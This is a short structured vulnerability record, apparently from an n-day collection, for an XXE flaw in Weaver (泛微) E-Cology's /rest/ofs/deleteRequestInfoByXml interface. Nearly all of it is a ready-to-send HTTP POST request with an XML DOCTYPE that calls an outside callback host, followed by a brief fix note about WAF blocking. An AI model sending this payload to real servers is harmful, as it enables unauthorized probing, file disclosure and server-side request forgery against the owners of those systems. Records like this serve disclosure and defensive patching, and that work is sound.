vendor = "泛微"
name = "泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞"
type = "XXE"
version = "未知"
path = "/rest/ofs/deleteRequestInfoByXml"
detail = "POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1 Host: Content-Type: application/xml Content-Length: 131 <?xml version=\"1.0\" encoding=\"utf-8\"?> <!DOCTYPE syscode SYSTEM \"http://hsdtcwwetk.dgrh3.cn\"> <M><syscode>&send;</syscode></M>"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
